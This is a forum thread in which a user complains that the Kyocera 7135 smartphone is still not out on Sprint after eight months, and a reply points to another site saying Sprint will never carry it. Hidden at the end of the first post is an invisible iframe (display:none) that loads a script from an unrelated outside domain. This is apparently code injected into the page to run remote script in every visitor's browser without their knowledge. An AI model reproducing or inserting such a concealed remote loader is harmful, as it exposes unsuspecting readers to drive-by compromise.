+ Reply to Thread
    Gadget Lover

Release Dates for Sprint

Okay, well i've been waiting for the 7135 to be released for Sprint since August, that's 8 months now since the original release date and I still see nothing. The most recent release date which was supposed to be assured was set in the vague time reference of the first quarter of the year, which will be ending here in a mear 11 days and still the 7135 is nowhere to be seen. I have been told that the hold up on the release is Sprint's fault and has to do with they're vision service not being fully compatiable with the Kyocera smartphone, but at the same time Sprint is saying that it's Kyocera's fault that the phone is not released, and they say that it may never be on the Sprint phone roster.

All I want is a straight answer to what is going on, I have been waiting 8 months now for a new phone and if this thing with the 7135 isn't going to work for me, I'd like to go out and buy the Samsung I-330. So PLEASE somebody tell me what's going on!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Release Dates for Sprint

Originally posted by akadan217
    Okay, well i've been waiting for the 7135 to be released for Sprint since August, that's 8 months now since the original release date and I still see nothing. The most recent release date which was supposed to be assured was set in the vague time reference of the first quarter of the year, which will be ending here in a mear 11 days and still the 7135 is nowhere to be seen. I have been told that the hold up on the release is Sprint's fault and has to do with they're vision service not being fully compatiable with the Kyocera smartphone, but at the same time Sprint is saying that it's Kyocera's fault that the phone is not released, and they say that it may never be on the Sprint phone roster.

All I want is a straight answer to what is going on, I have been waiting 8 months now for a new phone and if this thing with the 7135 isn't going to work for me, I'd like to go out and buy the Samsung I-330. So PLEASE somebody tell me what's going on!
    over at www.smartphonesource.com the most highly regarded opinion is that sprint will never carry the 7135 - check it out